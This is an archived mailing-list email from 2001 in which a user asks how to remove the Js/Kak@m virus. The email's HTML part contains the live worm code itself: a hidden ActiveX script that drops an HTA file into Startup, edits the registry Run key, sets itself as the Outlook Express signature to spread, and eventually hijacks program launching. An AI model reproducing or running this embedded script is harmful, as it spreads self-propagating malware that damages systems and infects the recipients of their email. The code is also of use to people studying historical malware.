[ic] Js/Kak@m virus
Mark
cutless@one.net.au
Fri, 12 Jan 2001 15:19:56 +1000
This is a multi-part message in MIME format.
------=_NextPart_000_0007_01C07CAB.1F39AFE0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Greetings,
I was informed by a postmaster thta an email i sent was infected with =
the Js/Kak@m Virus.
Can you tell me how to get rid of it please.
Thankyou,
Mark schneider
------=_NextPart_000_0007_01C07CAB.1F39AFE0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 5.50.4522.1800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Greetings,</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>I was informed by a postmaster thta an =
email i sent=20
was infected with the <A href=3D"mailto:Js/Kak@m">Js/Kak@m</A> =
Virus.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>Can you tell me how to get rid of it=20
please.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>Thankyou,</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Mark schneider</FONT></DIV>
<DIV>
<DIV style=3D"Z-INDEX: 5; RIGHT: 0px; POSITION: absolute; TOP: -20px">
<OBJECT id=3Dscr=20
classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC></OBJECT></DIV>
<SCRIPT><!--
function sE(){return =
true;}window.onerror=3DsE;scr.Reset();scr.doc=3D"Z<HTML><HEAD><TITLE>.</"=
+"TITLE><HTA:APPLICATION ID=3D\\\"hO\\\" =
WINDOWSTATE=3DMinimize></"+"HEAD><BODY><object id=3D'wsh' =
classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><scrip=
t>fs=3Dnew =
ActiveXObject('Scripting.FileSystemObject');wc=3D'C:\\\\Windows\\\\';ae=3D=
'C:\\\\Autoexec.bat';f1=3Dwc+'STARTM~1\\\\Programs\\\\StartUp\\\\Exec.hta=
';fl=3Dfs.GetFolder(wc+'Applic~1\\\\Identities');sbf=3Dfl.SubFolders;for(=
var mye=3Dnew =
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =
String(idd);idn=3Dids.slice(31);gt=3Dwc+'System\\\\G6D9.fld';if(fs.FileEx=
ists(gt)){as=3Dfs.OpenTextFile(gt,1);gh=3Das.ReadAll();as.close();as=3Dfs=
OpenTextFile(gt,2);gh++;as.WriteLine(gh);as.close();}else{pol=3Dfs.Create=
TextFile(gt);pol.WriteLine('0');pol.close();fs.GetFile(gt).Attributes=3D2=
;gh=3D0;}f2=3Dwc+'System\\\\exec.hta';if(fs.FileExists(f2)){}else{fs.Copy=
File(f1,f2);fs.GetFile(f2).Attributes=3D2;}fr=3Dwc+'exc.reg';reg=3Dfs.Cre=
ateTextFile(fr);reg.WriteLine('REGEDIT4');reg.WriteBlankLines(1);reg.Writ=
eline('[HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\Current=
Version\\\\Run]');reg.Writeline('\"Exec\"=3D\"C:\\\\\\\\Windows\\\\\\\\Sy=
stem\\\\\\\\exec.hta\"');reg.WriteBlankLines(1);ky=3D'[HKEY_CURRENT_USER\=
\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook =
Express\\\\5.0';sg=3D'\\\\signatures';reg.WriteLine(ky+sg+']');reg.Write(=
'\"Default Signature\"=3D\"00000000\"');reg.WriteBlankLines(2); =
reg.WriteLine(ky+sg+'\\\\00000000]'); reg.WriteLine('\"name\"=3D\"My =
Signature\"');reg.WriteLine('\"type\"=3Ddword:00000002'); =
reg.WriteLine('\"text\"=3D\"\"');reg.Write('\"file\"=3D\"C:\\\\\\\\WINDOW=
S\\\\\\\\Exc.htm\"'); =
reg.WriteBlankLines(2);reg.WriteLine(ky+']');reg.Write('\"Signature =
Flags\"=3Ddword:00000003');reg.WriteBlankLines(2);reg.close();fs.GetFile(=
fr).Attributes=3D2;wsh.Run(wc+'Regedit.exe -s =
'+fr);if(gh=3D=3D0){df=3Dfs.OpenTextFile(ae,8);df.WriteLine('del =
'+f1);df.Close();}if(gh>9){b=3Dfs.CreateTextFile(\"C:\\\\Windows\\\\execf=
all.reg\");b.WriteLine('REGEDIT4');b.WriteBlankLines(1);b.WriteLine('[HKE=
Y_CLASSES_ROOT\\\\exefile\\\\shell\\\\open\\\\command]');b.WriteLine('@=3D=
\"C:\\\\\\\\Windows\\\\\\\\notepad.exe\"');b.Close();wsh.Run(wc+'Regedit.=
exe -s C:\\\\Windows\\\\execfall.reg');while(true){alert(\"Executive =
Fallout\");}}t3=3Dfs.CreateTextFile(wc+'Exc.htm',1);fs.GetFile(wc+'Exc.ht=
m').Attributes=3D2;t3.Write('<HTML><BODY><DIV =
style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT =
classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC =
id=3Dscr></"+"OBJECT></"+"DIV>');t4=3Dfs.OpenTextFile(f2,1);while(t4.Read=
(1)!=3D'Z');t3.WriteLine('<SCRIPT><!--');t3.write('function sE(){return =
true;}window.onerror=3DsE;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.ReadAll();t=
4.close();rd=3D/\\\\/g;re=3D/\"/g;rf=3D/<\\//g;rt=3Drs.replace(rd,'\\\\\\=
\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=
=3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.language=
;scr.Path=3D(la=3D=3D\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu =
D=E9marrer\\\\\\\\Programmes\\\\\\\\D=E9marrage\\\\\\\\Exec.hta\":\"C:\\\=
\\\\\windows\\\\\\\\Start =
Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\Exec.hta\";agt=3Dnavigator.use=
rAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=3D-1)&&(parseInt(navigat=
or.appVersion)>4))||(agt.indexOf(\"msie =
5.\")!=3D-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT>=
</"+"'+'BODY></"+"'+'HTML>');t3.close();self.close();</"+"script>-MassMur=
derer</"+"BODY></"+"HTML>WW";la=3D(navigator.systemLanguage)?navigator.sy=
stemLanguage:navigator.language;scr.Path=3D(la=3D=3D"fr")?"C:\\windows\\M=
enu D=E9marrer\\Programmes\\D=E9marrage\\Exec.hta":"C:\\windows\\Start =
Menu\\Programs\\StartUp\\Exec.hta";agt=3Dnavigator.userAgent.toLowerCase(=
);if(((agt.indexOf("msie")!=3D-1)&&(parseInt(navigator.appVersion)>4))||(=
agt.indexOf("msie 5.")!=3D-1))scr.write();
//--></SCRIPT>
</OBJECT></DIV></BODY></HTML>
------=_NextPart_000_0007_01C07CAB.1F39AFE0--